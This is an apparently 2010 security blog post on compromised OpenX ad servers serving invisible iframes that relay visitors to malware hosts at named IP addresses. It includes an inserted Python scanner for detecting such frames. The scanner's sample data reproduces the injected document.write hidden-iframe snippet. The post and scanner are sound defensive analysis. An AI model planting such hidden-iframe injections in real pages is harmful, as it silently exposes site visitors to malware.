Still More Malicious Ads

July 13, 2010 - By Chris Larsen,

About two months ago, in "OpenX Serving More Than Ads", I wrote about compromised ad servers silently connecting browsers to malware while users perused legitimate sites.

Out-of-date ad server software continues to be a problem. Here are some examples from last week...


The site soaps.sheknows.com uses OpenX to display an image linked to their Facebook page:

infected ad example 1

The JavaScript that injects this image into the page has been modified by an attacker so that it also creates an invisible iframe pointing at an attack site, 91.213.174.37, which in turn relays the browser to the malware host at 91.213.174.35. Both addresses belong to a Russian ISP (VolgaHost).

The site lovingyou.com has a large banner ad on its main page, which changes when the page is refreshed:

infected ad sample 2

This ad is created by including JavaScript from advertising.sheknows.com, which makes it a nice two-for-one deal for the Bad Guys: compromising the ad server at sheknows.com affects not only that site's own visitors but also the visitors of every other site that embeds its ads.

Lastly, here's a banner ad that appeared on indianexpress.com and expressindia.com, both of which use the same OpenX ad server (promo.expressindia.com):

infected ad sample 4

This advertisement actually originates from doubleclick.net, but the ExpressIndia sites use OpenX to wrap the code that serves it. When the legitimate ad is injected into the page, so is an invisible iframe that points to malware.
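
One way to check what an ad server is actually handing back, as an added example written for this post rather than anything from Blue Coat or OpenX: the script below parses an ad response, whether straight HTML or the document.write() JavaScript that OpenX delivery tags emit, flags any iframe that is sized or styled so the visitor cannot see it, and then follows such frames from one response to the next to reproduce the relay described in the sheknows.com case (ad server to 91.213.174.37 to 91.213.174.35). The sample responses, the ads.example.com host and the in.php/load.php paths are constructed for the example; only the two IP addresses come from the post.

```python
"""Hidden-iframe scanner for ad server responses (added example, not Blue Coat code).

Finds <iframe>s a visitor could never see in what an ad server returns (HTML, or the
document.write() JavaScript OpenX delivery tags emit) and follows them across a set of
responses to reproduce the relay in the post: ad server -> attack site -> malware host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# document.write('...') or document.write("..."); the string body is group 2.
_DOC_WRITE = re.compile(r"""document\.write\s*\(\s*(['"])(.*?)(?<!\\)\1\s*\)""", re.S)
# Inline styles that take a frame out of view even when width/height look normal.
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|"
                           r"(?:left|top)\s*:\s*-\d{3,}px|(?:width|height)\s*:\s*0(?:px)?\b", re.I)

class _IframeCollector(HTMLParser):
    """Collects <iframe> attribute dicts, including frames written from inline <script>s."""
    def __init__(self):
        super().__init__()
        self.iframes, self._script = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._script = []   # buffer: the parser may hand script text over in chunks
    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.iframes.extend(_iframes_from_js("".join(self._script)))
            self._script = None

def _iframes_from_js(js):
    """Frames inside every document.write() string literal in a piece of JavaScript."""
    found = []
    for m in _DOC_WRITE.finditer(js):
        html = m.group(2).replace("\\/", "/").replace("\\'", "'").replace('\\"', '"')
        found.extend(extract_iframes(html))
    return found

def extract_iframes(body):
    """Attribute dict for every <iframe> in an HTML or JavaScript response body."""
    p = _IframeCollector()
    if body.lstrip().startswith("<"):
        p.feed(body)                               # HTML document or fragment
    else:
        p.iframes.extend(_iframes_from_js(body))   # raw JS, e.g. OpenX ajs.php output
    p.close()
    return p.iframes

def _dim(value):
    m = re.match(r"\s*(\d+)\s*(?:px)?\s*$", value or "")
    return int(m.group(1)) if m else None

def is_hidden(iframe):
    """True if the frame is sized or styled so that the visitor cannot see it."""
    w, h = _dim(iframe.get("width")), _dim(iframe.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    return bool(_HIDDEN_STYLE.search(iframe.get("style", ""))) or "hidden" in iframe

def scan_ad_response(body, served_from):
    """Hidden iframes in an ad response, flagging targets off the ad server's own host."""
    findings = []
    for f in extract_iframes(body):
        if is_hidden(f):
            host = urlparse(f.get("src", "")).hostname or ""
            findings.append({"src": f.get("src", ""), "host": host, "third_party": host != served_from})
    return findings

def follow_hidden_chain(start_url, fetch, max_hops=5):
    """Hosts reached by following hidden iframes from start_url; fetch(url) -> body or None."""
    chain, url = [urlparse(start_url).hostname], start_url
    for _ in range(max_hops):
        body = fetch(url)
        if body is None:
            break
        url = next((f["src"] for f in extract_iframes(body) if is_hidden(f) and f.get("src")), None)
        if url is None:
            break
        chain.append(urlparse(url).hostname)
    return chain

# Constructed sample responses, not captured traffic: the two IPs are the ones named in
# the post; ads.example.com and the .php paths are invented stand-ins.
AD_URL = "http://ads.example.com/www/delivery/ajs.php?zoneid=1"
SAMPLE_RESPONSES = {
    AD_URL: "document.write('<a href=\"http://www.facebook.com/example\"><img "
            "src=\"http://ads.example.com/images/fb.gif\" width=\"300\" height=\"250\"></a>');\n"
            "document.write('<iframe src=\"http://91.213.174.37/in.php\" width=\"0\" height=\"0\" "
            "style=\"visibility:hidden\"></iframe>');\n",
    "http://91.213.174.37/in.php": "<html><body><iframe src=\"http://91.213.174.35/load.php\" "
            "width=1 height=1 style=\"position:absolute;left:-2000px\"></iframe></body></html>",
    "http://91.213.174.35/load.php": "<html><body>malware landing page</body></html>",
}
```

Calling scan_ad_response(SAMPLE_RESPONSES[AD_URL], "ads.example.com") reports the single 0x0 frame pointing off-site at 91.213.174.37, and follow_hidden_chain(AD_URL, SAMPLE_RESPONSES.get) walks the constructed responses to the three-host chain ad server, 91.213.174.37, 91.213.174.35. The heuristics are string-based: they catch frames written with document.write(), the technique in these OpenX compromises, but not frames built with createElement() and appended at runtime, and a 0x0 frame can also be legitimate tracking, so treat a hit as a reason to inspect the target rather than proof on its own.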


It's always important to keep your software up to date, and that goes double for services running on publicly accessible servers. All of the ad servers in these examples are running OpenX 2.8.1; the current version is 2.8.5, so these sites are about six months behind.

And, if you think that only ad servers hosted by smaller sites are to blame, think again. Even large advertising networks fall prey to Bad Guys who inject malicious content into ad streams. Over the past week, I've observed connections to malware sites that have originated from ads served on pages like nasdaq.com, nydailynews.com, and latimes.com.


--TvdH